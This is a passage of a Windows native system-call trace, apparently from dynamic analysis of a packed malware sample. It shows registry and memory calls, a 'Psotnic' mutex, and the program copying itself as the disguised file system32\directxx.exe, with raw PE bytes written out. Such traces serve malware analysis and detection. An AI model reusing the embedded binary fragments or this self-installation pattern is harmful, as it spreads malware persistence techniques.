Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03437 896 NtQueryValueKey (324, (324, "wave7", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03438 896 NtQueryValueKey (324, (324, "wave8", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03439 896 NtQueryValueKey (324, (324, "wave9", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03440 896 NtQueryValueKey (324, (324, "midi", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (324, "midi", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0 03441 896 NtQueryValueKey (324, (324, "midi", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (324, "midi", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0 03442 896 NtQueryValueKey (324, (324, "midi1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (324, "midi1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0 03443 896 NtQueryValueKey (324, (324, "midi1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (324, "midi1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0 03444 896 NtQueryValueKey (324, (324, "midi2", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03445 896 NtQueryValueKey (324, (324, "midi3", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03446 896 NtQueryValueKey (324, (324, "midi4", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03447 896 NtQueryValueKey (324, (324, "midi5", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03448 896 NtQueryValueKey (324, (324, "midi6", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03449 896 NtQueryValueKey (324, (324, "midi7", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03450 896 NtQueryValueKey (324, (324, "midi8", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03451 896 NtQueryValueKey (324, (324, "midi9", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03452 896 NtQueryTimerResolution (... 156250, 10000, 156250, ) == 0x0 03453 896 NtQueryValueKey (324, (324, "aux", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (324, "aux", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0 03454 896 NtQueryValueKey (324, (324, "aux", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (324, "aux", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0 03455 896 NtQueryValueKey (324, (324, "aux1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (324, "aux1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0 03456 896 NtQueryValueKey (324, (324, "aux1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (324, "aux1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0 03457 896 NtQueryValueKey (324, (324, "aux2", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03458 896 NtQueryValueKey (324, (324, "aux3", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03459 896 NtQueryValueKey (324, (324, "aux4", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03460 896 NtQueryValueKey (324, (324, "aux5", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03461 896 NtQueryValueKey (324, (324, "aux6", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03462 896 NtQueryValueKey (324, (324, "aux7", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03463 896 NtQueryValueKey (324, (324, "aux8", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03464 896 NtQueryValueKey (324, (324, "aux9", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03465 896 NtUserRegisterWindowMessage ( ("MSJSTICK_VJOYD_MSGSTR", ... ) , ... ) == 0xc076 03466 896 NtOpenKey (0xf003f, {24, 28, 0x40, 0, 0, (0xf003f, {24, 28, 0x40, 0, 0, "System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm"}, ... 328, ) }, ... 328, ) == 0x0 03467 896 NtQueryValueKey (328, (328, "wheel", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (328, "wheel", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 03468 896 NtClose (328, ... ) == 0x0 03469 896 NtCreateEvent (0x1f0003, {24, 48, 0x80, 0, 0, (0x1f0003, {24, 48, 0x80, 0, 0, "DINPUTWINMM"}, 0, 0, ... ) }, 0, 0, ... ) == STATUS_ACCESS_DENIED 03470 896 NtQueryValueKey (324, (324, "mixer", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (324, "mixer", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0 03471 896 NtQueryValueKey (324, (324, "mixer", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (324, "mixer", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0 03472 896 NtQueryValueKey (324, (324, "mixer1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (324, "mixer1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0 03473 896 NtQueryValueKey (324, (324, "mixer1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (324, "mixer1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0 03474 896 NtQueryValueKey (324, (324, "mixer2", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03475 896 NtQueryValueKey (324, (324, "mixer3", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03476 896 NtQueryValueKey (324, (324, "mixer4", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03477 896 NtQueryValueKey (324, (324, "mixer5", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03478 896 NtQueryValueKey (324, (324, "mixer6", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03479 896 NtQueryValueKey (324, (324, "mixer7", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03480 896 NtQueryValueKey (324, (324, "mixer8", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03481 896 NtQueryValueKey (324, (324, "mixer9", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03482 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSVFW32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03483 896 NtQueryDefaultLocale (1, 1239804, ... ) == 0x0 03484 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avicap32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03485 896 NtQueryDefaultLocale (1, 1239808, ... ) == 0x0 03486 896 NtProtectVirtualMemory (-1, (0x73b81090), 4, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03487 896 NtProtectVirtualMemory (-1, (0x73b81090), 4, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03488 896 NtProtectVirtualMemory (-1, (0x73b81098), 4, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03489 896 NtProtectVirtualMemory (-1, (0x73b81098), 4, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03490 896 NtProtectVirtualMemory (-1, (0x73b810a8), 4, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03491 896 NtProtectVirtualMemory (-1, (0x73b810a8), 4, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03492 896 NtProtectVirtualMemory (-1, (0x73b810e0), 4, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03493 896 NtProtectVirtualMemory (-1, (0x73b810e0), 4, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03494 896 NtProtectVirtualMemory (-1, (0x73b81128), 4, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03495 896 NtProtectVirtualMemory (-1, (0x73b81128), 4, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03496 896 NtProtectVirtualMemory (-1, (0x73b8112c), 4, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03497 896 NtProtectVirtualMemory (-1, (0x73b8112c), 4, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03498 896 NtProtectVirtualMemory (-1, (0x73b81154), 4, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03499 896 NtProtectVirtualMemory (-1, (0x73b81154), 4, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03500 896 NtProtectVirtualMemory (-1, (0x73b81164), 4, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03501 896 NtProtectVirtualMemory (-1, (0x73b81164), 4, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03502 896 NtProtectVirtualMemory (-1, (0x73b81168), 4, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03503 896 NtProtectVirtualMemory (-1, (0x73b81168), 4, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03504 896 NtProtectVirtualMemory (-1, (0x73b81170), 4, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03505 896 NtProtectVirtualMemory (-1, (0x73b81170), 4, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03506 896 NtProtectVirtualMemory (-1, (0x76b4115c), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03507 896 NtProtectVirtualMemory (-1, (0x76b4115c), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03508 896 NtProtectVirtualMemory (-1, (0x76b41190), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03509 896 NtProtectVirtualMemory (-1, (0x76b41190), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03510 896 NtProtectVirtualMemory (-1, (0x76b4119c), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03511 896 NtProtectVirtualMemory (-1, (0x76b4119c), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03512 896 NtProtectVirtualMemory (-1, (0x76b411b8), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03513 896 NtProtectVirtualMemory (-1, (0x76b411b8), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03514 896 NtProtectVirtualMemory (-1, (0x76b411c0), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03515 896 NtProtectVirtualMemory (-1, (0x76b411c0), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03516 896 NtProtectVirtualMemory (-1, (0x76b411c8), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03517 896 NtProtectVirtualMemory (-1, (0x76b411c8), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03518 896 NtProtectVirtualMemory (-1, (0x76b411e0), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03519 896 NtProtectVirtualMemory (-1, (0x76b411e0), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03520 896 NtProtectVirtualMemory (-1, (0x76b411f0), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03521 896 NtProtectVirtualMemory (-1, (0x76b411f0), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03522 896 NtProtectVirtualMemory (-1, (0x76b411f8), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03523 896 NtProtectVirtualMemory (-1, (0x76b411f8), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03524 896 NtProtectVirtualMemory (-1, (0x76b41200), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03525 896 NtProtectVirtualMemory (-1, (0x76b41200), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03526 896 NtProtectVirtualMemory (-1, (0x76b41218), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03527 896 NtProtectVirtualMemory (-1, (0x76b41218), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03528 896 NtProtectVirtualMemory (-1, (0x76b41290), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03529 896 NtProtectVirtualMemory (-1, (0x76b41290), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03530 896 NtProtectVirtualMemory (-1, (0x76b41294), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03531 896 NtProtectVirtualMemory (-1, (0x76b41294), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03532 896 NtProtectVirtualMemory (-1, (0x76b41298), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03533 896 NtProtectVirtualMemory (-1, (0x76b41298), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03534 896 NtProtectVirtualMemory (-1, (0x76b412a0), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03535 896 NtProtectVirtualMemory (-1, (0x76b412a0), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03536 896 NtProtectVirtualMemory (-1, (0x76b412a4), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03537 896 NtProtectVirtualMemory (-1, (0x76b412a4), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03538 896 NtProtectVirtualMemory (-1, (0x76b412c4), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03539 896 NtProtectVirtualMemory (-1, (0x76b412c4), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03540 896 NtProtectVirtualMemory (-1, (0x76b412d8), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03541 896 NtProtectVirtualMemory (-1, (0x76b412d8), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03542 896 NtProtectVirtualMemory (-1, (0x76b412e0), 4, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03543 896 NtProtectVirtualMemory (-1, (0x76b412e0), 4, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03544 896 NtProtectVirtualMemory (-1, (0x75a71130), 4, 4, ... (0x75a71000), 4096, 32, ) == 0x0 03545 896 NtProtectVirtualMemory (-1, (0x75a71130), 4, 32, ... (0x75a71000), 4096, 4, ) == 0x0 03546 896 NtProtectVirtualMemory (-1, (0x75a7113c), 4, 4, ... (0x75a71000), 4096, 32, ) == 0x0 03547 896 NtProtectVirtualMemory (-1, (0x75a7113c), 4, 32, ... (0x75a71000), 4096, 4, ) == 0x0 03548 896 NtProtectVirtualMemory (-1, (0x75a71140), 4, 4, ... (0x75a71000), 4096, 32, ) == 0x0 03549 896 NtProtectVirtualMemory (-1, (0x75a71140), 4, 32, ... (0x75a71000), 4096, 4, ) == 0x0 03550 896 NtProtectVirtualMemory (-1, (0x75a71144), 4, 4, ... (0x75a71000), 4096, 32, ) == 0x0 03551 896 NtProtectVirtualMemory (-1, (0x75a71144), 4, 32, ... (0x75a71000), 4096, 4, ) == 0x0 03552 896 NtProtectVirtualMemory (-1, (0x75a71150), 4, 4, ... (0x75a71000), 4096, 32, ) == 0x0 03553 896 NtProtectVirtualMemory (-1, (0x75a71150), 4, 32, ... (0x75a71000), 4096, 4, ) == 0x0 03554 896 NtProtectVirtualMemory (-1, (0x75a71164), 4, 4, ... (0x75a71000), 4096, 32, ) == 0x0 03555 896 NtProtectVirtualMemory (-1, (0x75a71164), 4, 32, ... (0x75a71000), 4096, 4, ) == 0x0 03556 896 NtProtectVirtualMemory (-1, (0x75a71188), 4, 4, ... (0x75a71000), 4096, 32, ) == 0x0 03557 896 NtProtectVirtualMemory (-1, (0x75a71188), 4, 32, ... (0x75a71000), 4096, 4, ) == 0x0 03558 896 NtProtectVirtualMemory (-1, (0x75a71194), 4, 4, ... (0x75a71000), 4096, 32, ) == 0x0 03559 896 NtProtectVirtualMemory (-1, (0x75a71194), 4, 32, ... (0x75a71000), 4096, 4, ) == 0x0 03560 896 NtProtectVirtualMemory (-1, (0x75a711fc), 4, 4, ... (0x75a71000), 4096, 32, ) == 0x0 03561 896 NtProtectVirtualMemory (-1, (0x75a711fc), 4, 32, ... (0x75a71000), 4096, 4, ) == 0x0 03562 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 03563 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 03564 896 NtCreateMutant (0x1f0001, {24, 48, 0x80, 0, 0, (0x1f0001, {24, 48, 0x80, 0, 0, "Psotnic"}, 0, ... 328, ) }, 0, ... 328, ) == 0x0 03565 896 NtWaitForSingleObject (328, 0, {-300000000, -1}, ... ) == 0x0 03566 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\directxx.exe"}, 1242132, ... ) }, 1242132, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03567 896 NtCreateFile (0x80100080, {24, 0, 0x40, 0, 1241036, (0x80100080, {24, 0, 0x40, 0, 1241036, "\??\u:\work\packed.exe"}, 0x0, 0, 1, 1, 2097252, 0, 0, ... 332, {status=0x0, info=1}, ) }, 0x0, 0, 1, 1, 2097252, 0, 0, ... 332, {status=0x0, info=1}, ) == 0x0 03568 896 NtQueryInformationFile (332, 1241472, 8, AttributeFlag, ... {status=0x0, info=8}, ) == 0x0 03569 896 NtQueryInformationFile (332, 1241388, 24, Standard, ... {status=0x0, info=24}, ) == 0x0 03570 896 NtQueryInformationFile (332, 1241204, 40, Basic, ... {status=0x0, info=40}, ) == 0x0 03571 896 NtAllocateVirtualMemory (-1, 1396736, 0, 8192, 4096, 4, ... 1396736, 8192, ) == 0x0 03572 896 NtQueryInformationFile (332, 1394872, 4094, Stream, ... {status=0x0, info=38}, ) == 0x0 03573 896 NtQueryInformationFile (332, 1239652, 40, Basic, ... {status=0x0, info=40}, ) == 0x0 03574 896 NtQueryInformationFile (332, 1239928, 4, Ea, ... {status=0x0, info=4}, ) == 0x0 03575 896 NtCreateFile (0x40110080, {24, 0, 0x40, 0, 1239804, (0x40110080, {24, 0, 0x40, 0, 1239804, "\??\C:\WINDOWS\system32\directxx.exe"}, 0x0, 32, 0, 5, 100, 0, 0, ... }, 0x0, 32, 0, 5, 100, 0, 0, ... 03576 896 NtClose (-2147481368, ... ) == 0x0 03575 896 NtCreateFile ... 336, {status=0x0, info=2}, ) == 0x0 03577 896 NtQueryVolumeInformationFile (336, 1239956, 536, Attribute, ... {status=0x0, info=20}, ) == 0x0 03578 896 NtQueryInformationFile (336, 1239540, 40, Basic, ... {status=0x0, info=40}, ) == 0x0 03579 896 NtQueryVolumeInformationFile (332, 1239956, 536, Attribute, ... {status=0x0, info=20}, ) == 0x0 03580 896 NtQueryVolumeInformationFile (332, 1239300, 8, Device, ... {status=0x0, info=8}, ) == 0x0 03581 896 NtSetInformationFile (336, 1239856, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0 03582 896 NtCreateSection (0xf001f, 0x0, 0x0, 2, 134217728, 332, ... 340, ) == 0x0 03583 896 NtMapViewOfSection (340, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 2, ... (0x1000000), {0, 0}, 180224, ) == 0x0 03584 896 NtClose (340, ... ) == 0x0 03585 896 NtWriteFile (336, 0, 0, 0, (336, 0, 0, 0, "MZ\220\0\3\0\0\0\4\0\0\0\377\377\0\0\270\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\350\0\0\0\16\37\272\16\0\264\11\315!\270\1L\315!This program cannot be run in DOS mode.\15\15\12$\0\0\0\0\0\0\06\357\376\372r\216\220\251r\216\220\251r\216\220\251r\216\221\251\371\216\220\251\261\201\315\251u\216\220\251\11\222\234\251q\216\220\251\361\222\236\251j\216\220\251\35\221\233\251~\216\220\251\35\221\232\251\17\216\220\251&\255\240\251s\216\220\251&\255\241\251D\216\220\251Richr\216\220\251\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0PE\0\0L\1\6\0\1Y\37H\0\0\0\0\0\0\0\0\340\0\17\3\13\1\6\0\0\0\0\0\0\270\2\0\0\0\0\0\323\333\21\0\0\300\21\0\0@\2\0\0\0@\0\0\20\0\0\0\2\0\0\4\0\0\0\0\0\0\0\4\0\0\0\0\0\0\0\0p\23\0\0\4\0\0\0\0\0\0\2\0\0\0\0\0\20\0\0\20\0\0\0\0\20\0\0\20\0\0\0\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0,\353\22\0<\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\340\22\0`\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\0ext\0\0\0\366(\2\0\0\20\0\0\0:\1\0", 61440, 0x0, 0, ... {status=0x0, info=61440}, ) , 61440, 0x0, 0, ... {status=0x0, info=61440}, ) == 0x0 03586 896 NtWriteFile (336, 0, 0, 0, (336, 0, 0, 0, "\247vkd\4\356\301\22\231\37\275\2663\270l\376\267\263\21\210\306\24\232>R\222>\10EW\201&\235\370P\241\301u1\361\203$^3\312\256:{#d\213x\325\207\23d\347O\242\31\237\30\232,?\232\363\345\2018\204\236\336GV+\22BX\323\7\220\21\336\255\350F\250h\224J\27\2655\337Hkv\363\363g\331\214AE\301\335\177w.W\6\353\L\202>r'\35\243\31u\244\340\277\300.E\315 P/\5\6\324\34x\354G:\376\203\331\315\277\33\735\34R\270\1\302\365\334\6\222\21\362=Y\255\252HL\376\245\226\227\244\233\360}\20+\203E*c.a\254\353,\351\215|!;\201:L\11\322\2117\315\273a5\11\253\230\234\257K\3=\300:q\375\303\5\231\205\36\3545LV\323\263Zl\237\307\236\241J\214\274\220=\244[\276\310\336\210\367\25y\253A\302M\345\347\260\220\34w\12\24b\250\3761\6\4\215_\361\302W\5\12\244\30FYhA\31\200Aju\357\374\205G\5Ew:\330\270/\234q\256\274\364\324\351\305\264Ky\310\327\323\310A\245Le\376\353M>\7\322<\201\36l\203\334n Q\3\366rH\200\210)*\235\230\31\336\347\352\364tP\240G\316:\22\31t\345\327\373:\250"R\322^\204@G\245\326S$H3\305!\245\312\243\354^\13Y\357\177\232\2151\264\317\261 \241\305\\271Fvr5\373\235\331\307\226\4\305\300G\270\34\2232\235\252\264C\46J\27\3\367\324\260\325\227\37g9\10\222\27\226\240\227\247<4?\244\235\212P\212\335c\265\271\302\2Pv\223\367VM2\32/\0C\221\353\240?\2128\306\323\372\204\25d\343D{\345\2333>\177\203\1U\364\16>\6\352\1B\357\222\23Ql\255b\267\366\225\331\272Q\202", 61440, 0x0, 0, ... {status=0x0, info=61440}, ) R\322^\204@G\245\326S$H3\305!\245\312\243\354^\13Y\357\177\232\2151\264\317\261 \241\305\\271Fvr5\373\235\331\307\226\4\305\300G\270\34\2232\235\252\264C\46J\27\3\367\324\260\325\227\37g9\10\222\27\226\240\227\247<4?\244\235\212P\212\335c\265\271\302\2Pv\223\367VM2\32/\0C\221\353\240?\2128\306\323\372\204\25d\343D{\345\2333>\177\203\1U\364\16>\6\352\1B\357\222\23Ql\255b\267\366\225\331\272Q\202", 61440, 0x0, 0, ... {status=0x0, info=61440}, ) == 0x0 03587 896 NtWriteFile (336, 0, 0, 0, (336, 0, 0, 0, "\0]_^[\213\345]\303U\213L$\10\213)\213A\34P\213A\30P\350y\376\377\377\203\304\10]\302\4\0\314\314\314\314\314\314\314\314\314\314\314\314\215B\377[\303\215\244$\0\0\0\0\215d$\03\300\212D$\10S\213\330\301\340\10\213T$\10\367\302\3\0\0\0t\23\212\12B8\331t\321\204\311tQ\367\302\3\0\0\0u\355\13\330W\213\303\301\343\20V\13\330\213\12\277\377\376\376~\213\301\213\3673\313\3\360\3\371\203\361\377\203\360\3773\3173\306\203\302\4\201\341\0\1\1\201u\34%\0\1\1\201t\323%\0\1\1\1u\10\201\346\0\0\0\200u\304^_[3\300\303\213B\3748\330t6\204\300t\3578\334t'\204\344t\347\301\350\208\330t\25\204\300t\3348\334t\6\204\344t\324\353\226^_\215B\377[\303\215B\376^_[\303\215B\375^_[\303\215B\374^_[\303\314\314\314\314U\213\354W\213}\103\300\203\311\377\362\256A\367\331O\212E\14\375\362\256G8\7t\43\300\353\2\213\307\374_\311\303\314\314\314\314\314\314\314\314\314U\213\354WVS\213M\20\343&\213\331\213}\10\213\3673\300\362\256\367\331\3\313\213\376\213u\14\363\246\212F\3773\311:G\377w\4t\4II\367\321\213\301[^_\311\303\314\314\314\314\314\314\314\314\213L$\14W\205\311tzVS\213\331\213t$\24\367\306\3\0\0\0\213|$\20u\7\301\351\2uo\353!\212\6F\210\7GIt%\204\300t)\367\306\3\0\0\0u\353\213\331\301\351\2uQ\203\343\3t\15\212\6F\210\7G\204\300t/Ku\363\213D$\20[^_\303\367\307\3\0\0\0t\22\210\7GI\17\204\212\0\0\0\367\307\3\0\0\0u\356\213\331\301\351\2ul\210\7GKu\372[^\213", 56320, 0x0, 0, ... {status=0x0, info=56320}, ) , 56320, 0x0, 0, ... {status=0x0, info=56320}, ) == 0x0 03588 896 NtUnmapViewOfSection (-1, 0x1000000, ... ) == 0x0 03589 896 NtSetInformationFile (336, 1241204, 40, Basic, ... {status=0x0, info=0}, ) == 0x0 03590 896 NtClose (332, ... ) == 0x0 03591 896 NtClose (336, ... ) == 0x0 03592 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\explorer.exe"}, 1240988, ... ) }, 1240988, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03593 896 NtQueryAttributesFile ({24, 12, 0x40, 0, 0, ({24, 12, 0x40, 0, 0, "explorer.exe"}, 1240988, ... ) 